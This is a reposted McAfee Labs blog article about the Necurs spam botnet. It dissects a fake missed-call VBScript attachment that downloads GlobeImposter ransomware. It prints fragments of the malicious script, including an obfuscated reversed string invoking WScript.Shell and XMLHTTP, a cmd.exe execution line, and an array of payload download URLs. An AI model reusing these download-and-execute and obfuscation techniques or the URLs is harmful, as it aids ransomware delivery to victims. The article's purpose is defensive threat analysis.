Necurs Botnet Leads the World in Sending Spam Traffic

Haythem Elmir
0 1
Read Time2 Minute, 28 Second

In Q4 2017 we found that the Necurs and Gamut botnets comprised 97% of spam botnet traffic. (See the McAfee Labs Threats Report, March 2018.) Necurs (at 60%) is currently the world’s largest spam botnet. The infected computers operate in a peer-to-peer model, with limited communication between the nodes and the control servers. Cybercriminals can rent access to the botnet to spread their own malicious campaigns.

The most common techniques are email attachments with macros or JavaScript to download malware from different locations. In October, the Locky ransomware campaign used Microsoft’s Dynamic Data Exchange to lure victims into “updating” the attached document with data from linked files—external links that delivered the malware.

In Q4 we noticed several botnet campaigns delivering the following payloads:

  • GlobeImposter ransomware
  • Locky ransomware
  • Scarab ransomware
  • Dridex banking Trojan

A timeline:

Let’s zoom in on one of the campaigns from the Necurs botnet. In the following example, an email automatically sent from a VOIP system informs the victim of a missed call. The email contains an attachment, a Visual Basic script.

In this case, the name is “Outside Caller 19-12-2017 [random nr].” Here is some of the script code:

Execute "Sub Aodunnecessarilybusinesslike(strr):ZabiT.Savetofile writenopopbusinesslikeInPlaceOf , 2 : End Sub"

Disaster = "//21+12:ptth21+12ex"+"e.eUtaLHpbP\21+12elifotevas21+12ydoBes"+"nopser21+12etirw21+12nepo21+12epyT21+12PmeT21+12TeG21+12ssecorP21+12llehs.tpircsW21+12noitacilppA.llehs21+12" & "" 

 

This piece of code makes sure that the embedded code will be saved to a file. Note the second line of code: It is backward and calls the Windows script shell to execute the code. The following code string ensures that the backward line is read properly:

SudForMake = Split("Microsoft.XMLHTTP21+12Adodb.streaM"+StrReverse(Disaster),  "21+12")

 

The following line starts the saved code:

writenopopbusinesslikeMacAttack.Run("cmd."&"exe /c START """" "+" " & ArrArr ) 

 

Once the executable is started, it attempts to download the ransomware from the embedded URLs in the code: 

krapivec = Array("littleblessingscotons.com/jdh673hk?","smarterbaby.com/jdh673hk?","ragazzemessenger.com/jdh673hk?") 

 

The malware downloaded and executed is GlobeImposter ransomware. After encrypting all files and deleting the Volume Shadow copies to block file restore, the user is prompted with the request to buy the decryptor:

Spam botnets are one of the pillars of the cybercrime business. The authors of these botnets understand their market value and spend their rental income on continuous development. Their work keeps the infrastructure running, creates ever-changing spam messages, and delivers these messages to your inbox—with many avoiding spam blockers. This cybercrime effort should inspire your organization to discuss the implementation of DMARC (domain-based message authentication, reporting & conformance). To learn more about how DMARC can help protect against this kind of threat, visit dmarc.org

 

 

 

To read the original article:https://securingtomorrow.mcafee.com/mcafee-labs/necurs-botnet-leads-the-world-in-sending-spam-traffic/?utm_content=sf184135240&utm_source=twitter&utm_campaign=Enterprise#sf184135240

Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
100 %

Average Rating

5 Star
0%
4 Star
0%
3 Star
0%
2 Star
0%
1 Star
0%

Laisser un commentaire

Next Post

The South America connection and the leadership on ATM Malware development

Besides being known about corruption scandals, South America is a reference to the development of ATM malware spreading globally with Brazil, Colombia, and Mexico leading the way. A research conducted by KASPERSKY has revealed a convergence on attacks against financial institutions, where traditional crimes and cybercrime join forces together to target and […]